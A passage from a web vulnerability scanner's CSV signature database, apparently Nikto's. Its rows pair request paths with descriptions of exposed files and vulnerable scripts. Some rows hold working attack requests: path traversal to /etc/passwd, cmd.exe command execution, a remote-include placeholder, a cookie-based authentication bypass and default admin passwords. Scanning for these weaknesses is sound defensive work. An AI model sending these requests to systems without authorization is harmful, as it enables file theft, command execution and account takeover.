web.\",\"\",\"\"\n\"000305\",\"0\",\"3\",\"/webcart/carts/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000306\",\"0\",\"3\",\"/webcart/config/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000307\",\"0\",\"3\",\"/webcart/config/clients.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000308\",\"0\",\"3\",\"/webcart/orders/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000309\",\"0\",\"3\",\"/webcart/orders/import.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000310\",\"0\",\"3\",\"/webmail/horde/test.php\",\"GET\",\"Horde Versions\",\"\",\"\",\"\",\"\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000311\",\"0\",\"3\",\"/whateverJUNK(4).html\",\"GET\",\"InterScan HTTP Version\",\"\",\"\",\"\",\"\",\"InterScan VirusWall on the remote host reveals its version number in HTTP error messages.\",\"\",\"\"\n\"000312\",\"0\",\"3\",\"/ws_ftp.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can contain saved passwords for FTP sites\",\"\",\"\"\n\"000313\",\"0\",\"3\",\"/WS_FTP.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can contain saved passwords for FTP sites\",\"\",\"\"\n\"000314\",\"11871\",\"3\",\"@CGIDIRSMsmMask.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.\",\"\",\"\"\n\"000315\",\"0\",\"3\",\"/_mem_bin/auoconfig.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Displays the default AUO (LDAP) schema, including host and port.\",\"\",\"\"\n\"000316\",\"0\",\"3\",\"/_mem_bin/auoconfig.asp\",\"GET\",\"LDAP\",\"\",\"\",\"\",\"\",\"LDAP information revealed via asp. See http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm\",\"\",\"\"\n\"000317\",\"17664\",\"3\",\"/_mem_bin/remind.asp\",\"GET\",\"Recover\",\"\",\"200\",\"\",\"\",\"Page will give the password reminder for any user requested (username must be known).\",\"\",\"\"\n\"000318\",\"0\",\"3\",\"/exchange/lib/ATTACH.INC\",\"GET\",\"File upload\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000319\",\"17659\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/vs.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000320\",\"17661\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000321\",\"17662\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000322\",\"17660\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000323\",\"0\",\"3\",\"/trace.axd\",\"GET\",\"Application Trace\",\"\",\"\",\"\",\"\",\"The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.\",\"\",\"\"\n\"000324\",\"0\",\"3\",\"/tvcs/getservers.exe?action=selects1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.\",\"\",\"\"\n\"000325\",\"0\",\"3\",\"/whatever.htr\",\"GET\",\"<html>Error: The requested file could not be found\\. <\\/html>\",\"200\",\"\",\"\",\"\",\"May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)\",\"\",\"\"\n\"000327\",\"0\",\"3\",\"/./\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Appending '/./' to a directory allows indexing\",\"\",\"\"\n\"000328\",\"0\",\"3\",\"/nsn/fdir.bas:ShowVolume\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in\",\"\",\"\"\n\"000329\",\"0\",\"3\",\"/nsn/fdir.bas\",\"GET\",\"FDIR\\sv1\",\"\",\"\",\"\",\"\",\"You can use fdir to ShowVolume and ShowDirectory.\",\"\",\"\"\n\"000330\",\"0\",\"3\",\"/servlet/webacc?User.html=noexist\",\"GET\",\"templates\\/\",\"\",\"\",\"404\",\"\",\"Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.\",\"\",\"\"\n\"000331\",\"0\",\"4\",\"/forum/admin/database/wwForum.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein\",\"\",\"\"\n\"000332\",\"0\",\"4\",\"/webmail/blank.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.\",\"\",\"\"\n\"000333\",\"0\",\"5\",\"/jamdb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.\",\"\",\"\"\n\"000334\",\"1201\",\"6\",\"/cgi/cgiproc?\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.\",\"\",\"\"\n\"000335\",\"0\",\"7\",\"@CGIDIRSaddbanner.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000336\",\"836\",\"7\",\"@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"AlienForm2 revision 1.5 allows any file to be read from the remote system.\",\"\",\"\"\n\"000337\",\"0\",\"7\",\"@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"AlienForm2 revision 1.5 allows any file to be read from the remote system.\",\"\",\"\"\n\"000338\",\"0\",\"7\",\"@CGIDIRSshtml.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to retrieve document source.\",\"\",\"\"\n\"000339\",\"2400\",\"7\",\"/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2.\",\"\",\"\"\n\"000340\",\"0\",\"8\",\"@CGIDIRSaglimpse.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"000341\",\"0\",\"8\",\"@CGIDIRSaglimpse\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"000342\",\"0\",\"8\",\"@CGIDIRSarchitext_query.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000343\",\"0\",\"8\",\"@CGIDIRScgiemail-1.4/cgicso?query=AAA\",\"GET\",\"400 Required field missing: fingerhost\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000344\",\"0\",\"8\",\"/cgi-local/cgiemail-1.6/cgicso?query=AAA\",\"GET\",\"400 Required field missing: fingerhost\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000345\",\"6196\",\"8\",\"/servlet/SchedulerTransfer\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999\",\"\",\"\"\n\"000346\",\"0\",\"8\",\"/servlet/sunexamples.BBoardServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"This default servlet lets attackers execute arbitrary commands.\",\"\",\"\"\n\"000347\",\"6196\",\"8\",\"/servlets/SchedulerTransfer\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999\",\"\",\"\"\n\"000348\",\"0\",\"8\",\"@CGIDIRScmd.exe?/c+dir\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"cmd.exe can execute arbitrary commands\",\"\",\"\"\n\"000349\",\"0\",\"8\",\"@CGIDIRScmd1.exe?/c+dir\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"cmd1.exe can execute arbitrary commands\",\"\",\"\"\n\"000350\",\"0\",\"8\",\"@CGIDIRShello.bat?&dir+c:\\\\\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This batch file may allow attackers to execute remote commands.\",\"\",\"\"\n\"000351\",\"0\",\"8\",\"@CGIDIRSpost32.exe|dir%20c:\\\\\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"post32 can execute arbitrary commands\",\"\",\"\"\n\"000352\",\"0\",\"8\",\"/perl/-e%20print%20Hello\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The Perl interpreter on the Novell system may allow any command to be executed. See BID-5520. Installing Perl 5.6 might fix this issue.\",\"\",\"\"\n\"000353\",\"0\",\"ae\",\"/admin.cgi\",\"GET\",\"Administration\",\"\",\"\",\"\",\"\",\"InterScan VirusWall administration is accessible without authentication.\",\"\",\"\"\n\"000354\",\"0\",\"ae\",\"/interscan/\",\"GET\",\"Administration\",\"\",\"\",\"\",\"\",\"InterScan VirusWall administration is accessible without authentication.\",\"\",\"\"\n\"000355\",\"0\",\"a\",\"/vgn/legacy/save\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.\",\"\",\"\"\n\"000356\",\"0\",\"b\",\"/\",\"GET\",\"default Tomcat\",\"\",\"\",\"\",\"\",\"Appears to be a default Apache Tomcat install.\",\"\",\"\"\n\"000357\",\"0\",\"b\",\"/IDSWebApp/IDSjsp/Login.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tivoli Directory Server Web Administration.\",\"\",\"\"\n\"000358\",\"6466\",\"b\",\"/quikstore.cfg\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"000359\",\"0\",\"b\",\"/quikstore.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A shopping cart.\",\"\",\"\"\n\"000360\",\"0\",\"b\",\"/securecontrolpanel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web Server Control Panel\",\"\",\"\"\n\"000361\",\"0\",\"b\",\"/siteminder\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be an indication that the server is running Siteminder for SSO\",\"\",\"\"\n\"000362\",\"0\",\"b\",\"/webmail/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web based mail package installed.\",\"\",\"\"\n\"000363\",\"0\",\"b\",\"/Xcelerate/LoginPage.html\",\"GET\",\"Xcelerate Login Page\",\"\",\"\",\"\",\"\",\"Xcelerate Content Server by Divine/OpenMarket login page found.\",\"\",\"\"\n\"000364\",\"0\",\"b\",\"/_cti_pvt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"000365\",\"0\",\"b\",\"/smg_Smxcfg30.exe?vcc=3560121183d3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be a Trend Micro Officescan 'backdoor'.\",\"\",\"\"\n\"000366\",\"0\",\"2b\",\"/examples/servlets/index.html\",\"GET\",\"Servlet Examples\",\"\",\"\",\"\",\"\",\"Apache Tomcat default JSP pages present.\",\"\",\"\"\n\"000367\",\"0\",\"3b\",\"/nsn/..%5Cutil/attrib.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000368\",\"0\",\"3b\",\"/nsn/..%5Cutil/chkvol.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000369\",\"0\",\"3b\",\"/nsn/..%5Cutil/copy.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000370\",\"0\",\"3b\",\"/nsn/..%5Cutil/del.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000371\",\"0\",\"3b\",\"/nsn/..%5Cutil/dir.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000372\",\"0\",\"3b\",\"/nsn/..%5Cutil/dsbrowse.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000373\",\"0\",\"3b\",\"/nsn/..%5Cutil/glist.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000374\",\"0\",\"3b\",\"/nsn/..%5Cutil/lancard.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000375\",\"0\",\"3b\",\"/nsn/..%5Cutil/md.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000376\",\"0\",\"3b\",\"/nsn/..%5Cutil/rd.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000377\",\"0\",\"3b\",\"/nsn/..%5Cutil/ren.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server \",\"\",\"\"\n\"000378\",\"0\",\"3b\",\"/nsn/..%5Cutil/send.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000379\",\"0\",\"3b\",\"/nsn/..%5Cutil/set.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000380\",\"0\",\"3b\",\"/nsn/..%5Cutil/slist.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000381\",\"0\",\"3b\",\"/nsn/..%5Cutil/type.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000382\",\"0\",\"3b\",\"/nsn/..%5Cutil/userlist.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000383\",\"0\",\"3b\",\"/nsn/..%5Cweb/env.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000384\",\"0\",\"3b\",\"/nsn/..%5Cweb/fdir.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000385\",\"0\",\"3b\",\"/nsn/..%5Cwebdemo/env.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000386\",\"0\",\"3b\",\"/nsn/..%5Cwebdemo/fdir.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server\",\"\",\"\"\n\"000387\",\"19767\",\"c\",\"/wikihome/action/conflict.php?TemplateDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Some versions of WikkiTikkiTavi allow external source to be included.\",\"\",\"\"\n\"000388\",\"0\",\"1\",\"@CGIDIRSarchie\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000389\",\"0\",\"1\",\"@CGIDIRScalendar.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000390\",\"0\",\"1\",\"@CGIDIRScalendar\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000391\",\"0\",\"1\",\"@CGIDIRSdate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000392\",\"0\",\"1\",\"@CGIDIRSfortune\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000393\",\"0\",\"1\",\"@CGIDIRSredirect\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Redirects via URL from form\",\"\",\"\"\n\"000394\",\"0\",\"1\",\"@CGIDIRSuptime\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000395\",\"0\",\"1\",\"@CGIDIRSwais.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000396\",\"0\",\"2\",\"//\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.\",\"\",\"\"\n\"000397\",\"0\",\"2\",\"/webtop/wdk/\",\"GET\",\"Directory Listing for \\/wdk\\/\",\"\",\"\",\"\",\"\",\"Documentum Webtop Server appears to be installed\",\"\",\"\"\n\"000398\",\"17113\",\"2\",\"/SilverStream\",\"GET\",\"title>.*SilverStream.*<\\/title\",\"\",\"\",\"\",\"\",\"SilverStream allows directory listing\",\"\",\"\"\n\"000399\",\"0\",\"2e\",\"/signon\",\"GET\",\"Administrator Login\",\"\",\"\",\"\",\"\",\"Tivoli administrator login found. Test the default login of admin/admin.  Tivoli allows system administration.\",\"\",\"\"\n\"000400\",\"0\",\"2\",\"/upd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000401\",\"0\",\"3\",\"/examples/jsp/source.jsp??\",\"GET\",\"Directory Listing\",\"\",\"\",\"\",\"\",\"Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.\",\"\",\"\"\n\"000402\",\"34884\",\"3\",\"/lpt9\",\"GET\",\"FileNotFoundException:\",\"\",\"\",\"\",\"\",\"Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.\",\"\",\"\"\n\"000403\",\"0\",\"3\",\"/cfcache.map\",\"GET\",\"Mapping=\",\"\",\"SourceTimeStamp\",\"\",\"\",\"May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/5BP081F0AC.html\",\"\",\"\"\n\"000404\",\"0\",\"3\",\"/cfdocs/cfcache.map\",\"GET\",\"Mapping=\",\"\",\"SourceTimeStamp\",\"\",\"\",\"May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/5BP081F0AC.html\",\"\",\"\"\n\"000405\",\"0\",\"3\",\"/CVS/Entries\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CVS Entries file may contain directory listing information.\",\"\",\"\"\n\"000406\",\"0\",\"3\",\"/lpt9.xtp\",\"GET\",\"java\\.io\\.FileNotFoundException:\",\"\",\"\",\"\",\"\",\"Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.\",\"\",\"\"\n\"000408\",\"8450\",\"37\",\"@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../\",\"GET\",\"Ignoring file  \\.<\\/font><\\/p>\",\"200\",\"\",\"\",\"\",\"phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.\",\"\",\"\"\n\"000409\",\"0\",\"3\",\"/asp/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000410\",\"0\",\"3\",\"/asp/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000411\",\"0\",\"3\",\"/iissamples/issamples/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000412\",\"0\",\"3\",\"/iissamples/issamples/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000413\",\"0\",\"3\",\"/ISSamples/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000414\",\"0\",\"3\",\"/ISSamples/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000415\",\"0\",\"3\",\"/junk.aspx\",\"GET\",\"NET Framework Version:\",\"\",\"\\[FileNotFoundException\\]:\",\"\",\"\",\"ASP.NET reveals its version in invalid .aspx error messages.\",\"\",\"\"\n\"000416\",\"0\",\"3\",\"/oc/Search/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000417\",\"0\",\"3\",\"/oc/Search/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000418\",\"0\",\"3\",\"/search/htx/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000419\",\"0\",\"3\",\"/search/htx/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000420\",\"0\",\"3\",\"/search/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000421\",\"0\",\"3\",\"/search/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000422\",\"0\",\"3\",\"/sqlqhit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000423\",\"0\",\"3\",\"/SQLQHit.asp\",\"GET\",\"CHARACTERIZATION\",\"\",\"\",\"\",\"\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000424\",\"15455\",\"3\",\"@CGIDIRScom5..........................................................................................................................................................................................................................box\",\"GET\",\"Execution of Perl script\",\"\",\"\",\"\",\"\",\"Lotus reveals file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000425\",\"15455\",\"3\",\"@CGIDIRScom5.java\",\"GET\",\"Execution of\",\"\",\"\",\"\",\"\",\"Lotus reveals file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000426\",\"15455\",\"3\",\"@CGIDIRScom5.pl\",\"GET\",\"Execution of Perl script\",\"\",\"\",\"\",\"\",\"Lotus reveals file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000428\",\"0\",\"3\",\"/?OpenServer\",\"GET\",\"\\\\\\/icons\\\\\\/abook\\\\\\.gif\",\"\",\"\",\"\",\"\",\"This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html\",\"\",\"\"\n\"000431\",\"50\",\"3\",\"/cgi-bin/testing_whatever\",\"GET\",\"domino\\/cgi-bin\",\"\",\"\",\"\",\"\",\"The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.\",\"\",\"\"\n\"000436\",\"31150\",\"3\",\"/LOGIN.PWD\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.\",\"\",\"\"\n\"000437\",\"31150\",\"3\",\"/USER/CONFIG.AP\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MIPCD configuration information. MIPCD should not have the web interface enabled.\",\"\",\"\"\n\"000438\",\"0\",\"3\",\"@CGIDIRSmail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Simple Perl mailing script to send form data to a pre-configured email address\",\"\",\"\"\n\"000439\",\"0\",\"3\",\"@CGIDIRSnph-error.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gives more information in error messages\",\"\",\"\"\n\"000440\",\"0\",\"3\",\"@CGIDIRSpost-query\",\"POST\",\"MYDATA\",\"\",\"\",\"\",\"\",\"Echoes back result of your POST\",\"MYDATA\",\"\"\n\"000441\",\"0\",\"3\",\"@CGIDIRSquery\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Echoes back result of your GET\",\"\",\"\"\n\"000442\",\"0\",\"3\",\"@CGIDIRStest-cgi.tcl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May echo environment variables or give directory listings\",\"\",\"\"\n\"000443\",\"0\",\"3\",\"@CGIDIRStest-env\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May echo environment variables or give directory listings\",\"\",\"\"\n\"000444\",\"57612\",\"3\",\"/.perf\",\"GET\",\"ListenSocket\",\"\",\"\",\"\",\"\",\"Contains Netscape/iPlanet server performance information\",\"\",\"\"\n\"000445\",\"122\",\"3\",\"/\",\"get\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Fasttrack can give a directory listing if issued 'get' instead of 'GET'\",\"\",\"\"\n\"000446\",\"0\",\"3\",\"/\",\"INDEX\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.\",\"\",\"\"\n\"000447\",\"0\",\"3\",\"//\",\"GET\",\"Proxy autoconfig\",\"\",\"\",\"\",\"\",\"Proxy auto configuration file retrieved.\",\"\",\"\"\n\"000448\",\"0\",\"3\",\"/admin-serv/config/admpw\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This file contains the encrypted Netscape admin password. It 